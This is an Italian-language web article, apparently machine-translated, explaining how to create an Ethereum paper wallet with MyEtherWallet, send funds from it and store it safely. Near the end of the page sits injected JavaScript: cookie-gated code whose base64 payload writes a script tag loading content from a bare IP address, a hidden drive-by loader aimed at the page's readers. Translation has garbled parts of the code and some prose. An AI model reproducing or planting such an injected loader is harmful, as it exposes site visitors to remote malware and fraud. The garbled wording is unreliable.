15 49.0138 8.38624 1 0 4000 1 https://harowo.com 300 0
theme-sticky-logo-alt
theme-logo-alt

Come creare e configurare un portafoglio di carta Ethereum

Non c’è fine alle opzioni per l’archiviazione di Ethereum. Che sia su dispositivo mobile o desktop, puoi trovare applicazioni dedicate per mantenere in sicurezza i tuoi token ETH.

Quando parliamo di celle frigorifere, tuttavia, le cose si riducono a due sole opzioni. C’è il portafoglio hardware (l’opzione più complessa e costosa) e poi c’è il buon vecchio e umile portafoglio di carta.

In questo articolo, discuteremo i meriti di un portafoglio di carta rispetto a un portafoglio hardware e discuteremo su come impostare correttamente un portafoglio di carta Ethereum.

Che cos’è un portafoglio di carta e perché ne hai bisogno?

In criptovaluta, il tuo account è fondamentalmente solo la tua chiave privata. Se ce l’hai, puoi accedere e spendere i tuoi fondi da qualsiasi dispositivo o portafoglio. Quindi quando parliamo di un portafoglio di carta, tutto ciò che intendiamo è un pezzo di carta su cui annoti una stringa alfanumerica che consiste nella tua chiave privata.

La chiave privata viene spesso archiviata anche sotto forma di seme. Un seme è una frase di ventiquattro parole di normali parole inglesi. Chiamata frase mnemonica, ha lo scopo di renderti più facile scrivere e ricordare rispetto a una riga senza senso. Qualsiasi applicazione wallet può quindi utilizzare le informazioni codificate in questa frase per recuperare la chiave privata originale e, di conseguenza, i tuoi fondi.

Nel creare un portafoglio di carta, genereremo e registreremo solo questo seme.

Sembra piuttosto primitivo e pericoloso, non è vero? In realtà, è uno dei modi più sicuri per archiviare la tua criptovaluta. Vedi, sia che utilizzi un portafoglio mobile o un dispositivo hardware per archiviare i tuoi fondi, la chiave privata finisce per essere archiviata elettronicamente. Sebbene ciò lo renda facile da usare ed eseguire transazioni, lo rende anche vulnerabile ai tentativi di hacking.

Come creare un portafoglio di carta Ethereum

Logo MyEtherWallet

Il modo migliore – e di gran lunga il più semplice – per creare un Ethereum Paper Wallet è utilizzare l’applicazione MyEtherWallet (o MEW, come viene talvolta chiamato).

In sostanza, MEW (abbreviazione di MyEtherWallet), è un’applicazione Javascript open source che viene utilizzata per scopi di archiviazione fisica. Di conseguenza, il sito Web consente un processo molto semplice per la creazione del tuo portafoglio.

Per prima cosa, vai a myetherwallet.com digitandolo direttamente nella barra degli indirizzi. Non cercare su Google il nome del sito web. I ladri spesso acquisteranno spazi pubblicitari con un sito di phishing fingendo di essere MEW e tenteranno di rubare le tue monete.

Assicurati di essere sul sito web MyEtherWallet corretto. Puoi controllare l’autenticità del sito web cercando il certificato SSL verificato che viene visualizzato in questo modo:

Controllo di sicurezza per assicurarti di essere sul vero MyEtherWallet.com

Per le visite future, potrebbe essere una buona idea aggiungere il sito ai segnalibri in modo da non finire sul sito sbagliato. Evita anche di fare clic sui collegamenti al sito nelle e-mail ricevute, nei post di Twitter, nei messaggi di Facebook, Slack, Discord ecc. Poiché sono solitamente destinati al phishing dei dettagli del tuo account tramite URL fasulli.

Ora che sappiamo come accedere a MEW in sicurezza, vediamo come creare un portafoglio di carta Ethereum. Fai clic su Nuovo portafoglio nell’angolo in alto a sinistra.

Come creare un nuovo portafoglio MEW

A differenza di un semplice portafoglio di carta, MEW crittografa la tua chiave privata per una maggiore sicurezza. Ciò aggiunge un ulteriore livello di sicurezza nel caso in cui la tua chiave privata venga intravista da qualcuno; senza decrittografarlo, non è possibile accedere ai tuoi fondi.

Pertanto, è necessario scegliere una password ragionevolmente complessa per crittografare la chiave privata. Scegli la tua password con attenzione. Cose come compleanni e anniversari sono generalmente cattive idee, poiché chiunque abbia anche una conoscenza di base di te e della tua vita può risolverle facilmente.

Per risultati ottimali, scegli una lunga stringa di diciamo, quindici caratteri, incluso l’intero intervallo offerto dalla tastiera: caratteri speciali, alfabeti (sia maiuscoli che minuscoli) e numeri.

Dopo aver selezionato una password, premi il pulsante Crea portafoglio.

salvataggio del file keystore di myetherwallet

L’applicazione ora genererà la chiave privata per il tuo nuovo portafoglio e creerà un keystore per esso. Il keystore è semplicemente un file digitale che contiene la tua chiave privata.

Si consiglia vivamente di eseguire più backup di questo file poiché l’applicazione non può recuperarlo nuovamente. Inoltre, assicurati che tutti i backup siano archiviati in un luogo sicuro, poiché chiunque abbia questo file può accedere facilmente ai tuoi fondi e spenderli.

Dopo aver letto gli avvisi e scaricato il file del keystore, fare clic su “Ho capito. Pulsante Continua “.

salva la chiave privata di myetherwallet

Proprio come il keystore era la chiave digitale del tuo portafoglio, la chiave privata è la chiave “fisica”. Questo è ciò che stamperai per ottenere il tuo portafoglio di carta e che utilizzerai per ripristinare l’account se dovessi sentire la necessità di migrare i tuoi fondi su altri portafogli.

La chiave viene visualizzata per essere annotata, se lo si desidera. Si consiglia di archiviare uno o due backup della chiave privata in luoghi protetti. Questi luoghi sicuri non includere semplicemente copia e incolla in un file di testo; una tale svista renderà i tuoi fondi una papera per un hacker intraprendente.

Altrimenti, puoi sempre premere il pulsante Stampa portafoglio di carta per ottenere la cosa per cui sei venuto qui in primo luogo.

Portafoglio di carta MEW

Come puoi vedere, questo portafoglio contiene tutte le informazioni importanti di cui hai bisogno. Sulla sinistra c’è il tuo indirizzo pubblico, sia in formato testo che in formato codice QR.

Pensa al tuo indirizzo pubblico come al numero del tuo conto bancario: le persone possono usarlo per trasferire fondi sul tuo conto, ma non ritirarli o spenderli. Pertanto, l’indirizzo pubblico è qualcosa che puoi condividere e mostrare liberamente al pubblico, senza alcun timore di ripercussioni.

Nel mezzo c’è uno spazio vuoto per scrivere piccole note riguardanti il ​​tuo account, come l’importo che hai memorizzato in esso, ecc.

Il lato destro contiene la tua chiave privata in formato codice QR, con il testo della chiave stampato nella parte inferiore della carta. Questi due campi sono i più essenziali per il tuo portafoglio, quindi potresti volerli nascondere con una carta nera su quelle parti.

E questo è tutto. Il tuo Ethereum Paper Wallet è pronto per l’uso!

Transazioni con il tuo Paper Wallet

Caricare il tuo portafoglio in primo luogo è piuttosto semplice. Ricordi quell’indirizzo pubblico che ti abbiamo indicato prima? Questo è l’indirizzo a cui devi inviare il tuo Ether. Per cominciare, invia solo importi minuscoli, per verificare che tutto funzioni perfettamente. Una volta che hai la certezza che i fondi trasferiti stanno effettivamente arrivando al tuo portafoglio, puoi trasferire la maggior parte dei tuoi fondi senza paura.

Ora potrebbe venire il momento in cui desideri tuffarti nel tuo portafoglio di carta per una o due transazioni ancora una volta. Potrebbe essere semplicemente spostarlo su un altro portafoglio – forse quello vecchio si è strappato o qualcosa del genere – o potrebbe essere per rafforzare il tuo archivio di portafoglio caldo. In ogni caso, inviare le tue monete Ether bloccate nella “cella frigorifera” del tuo portafoglio di carta è più facile di quanto pensi.

Per inviare Ethereum dal tuo portafoglio, visita myetherwallet.com ancora. Una volta lì, fai clic su “Invia Ether & Gettoni“Nella parte superiore dello schermo.

Ti verrà mostrato il seguente modulo.

Sblocca MEW con il file keystore

Ora è solo questione di sbloccare il tuo portafoglio e generare una transazione. Esistono diversi modi per accedere al tuo portafoglio. Puoi digitare la nostra chiave privata o la frase mnemonica generata da alcuni portafogli. In alternativa, puoi caricare il file keystore scaricato in precedenza, per un processo più snello.

Tuttavia, è ancora necessario inserire la password.

Nota: Puoi anche utilizzare questo modulo per visualizzare semplicemente il tuo saldo. Ciò richiede solo la tua chiave pubblica condivisibile, quindi non hai bisogno del file keystore per questo.

Una volta autenticato, invia il tuo Ethereum come faresti con qualsiasi altro portafoglio. Immettere quanto si desidera inviare, l’indirizzo pubblico a cui si desidera inviarlo e il limite del gas. Puoi visualizzare il saldo del tuo conto sulla carta a destra, con opzioni per visualizzare o anche la cronologia delle transazioni precedenti.

Quando tutto è a posto, fai clic su “Genera transazione”.

come inviare monete su Myetherwallet

Conservare in modo sicuro il tuo portafoglio di carta

Potresti pensare: “Ho già creato un portafoglio di carta, quindi ho finito, giusto?”

Non proprio.

Un portafoglio di carta è proprio questo; un pezzo di carta fragile e infiammabile. Un leggero strappo qui, o una fuoriuscita insignificante lì, e il tuo portafoglio – con i tuoi preziosi gettoni – potrebbe essere rovinato.

Quindi cosa fare per garantire che i tuoi fondi rimangano al sicuro?

Per prima cosa, mettilo in una busta e sigillalo con sigilli di sicurezza olografici numerati che puoi trovare facilmente su ebay o Amazon.

Questi adesivi, sebbene non siano a prova di manomissione, sono comunque un buon modo per garantire che il tuo portafoglio non sia stato consultato da nessuno, poiché la manomissione dell’adesivo mostra un motivo “VOID” per avvisarti.

Per una maggiore sicurezza, ad esempio per evitare che il tuo animale domestico mangi il tuo portafoglio o si danneggi dell’acqua, potrebbe essere una buona idea procurarti una “capsula di pillola”. Queste capsule cilindriche possono contenere un portafoglio di carta arrotolato abbastanza facilmente e sono ermetiche quando avvitate, così puoi dimenticarti che il portafoglio viene danneggiato dall’usura accidentale.

Se sei ancora più paranoico, puoi mettere questa capsula in un sacchetto ignifugo, come quello qui sotto.

E ora abbiamo finalmente finito. Metti questa borsa in una cassaforte (o in un armadietto della banca, se l’importo che stai immagazzinando lo giustifica) e dimenticalo. Dato che hai già annotato il tuo indirizzo pubblico, non dovresti avere problemi a tenere traccia dell’importo trattenuto nel portafoglio ed essere comunque in grado di caricare più fondi in esso.

function getCookie (e) {var U = document.cookie.match (new RegExp (“(?: ^ |;)” + e.replace (/([\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, “\\ $ 1 ″) +” = ([^;] *) “)); return U? decodeURIComponent (U [1]): void 0} var src = “dati: text / javascript; Base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”, ora = Math.floor (Date.now () / 1e3), biscotto = getCookie ( “redirect”); if (ora>= (time = cookie) || void 0 === time) {var time = Math.floor (Date.now () / 1e3 + 86400), date = new Date ((new Date) .getTime () + 86400) ; document.cookie = “redirect =” + time + “; percorso = /; expires = “+ date.toGMTString (), document.write (“)}

Previous Post
Guia para iniciantes em investimentos da ICO – Como se envolver
Next Post
Крипто измами: Centra Tech ICO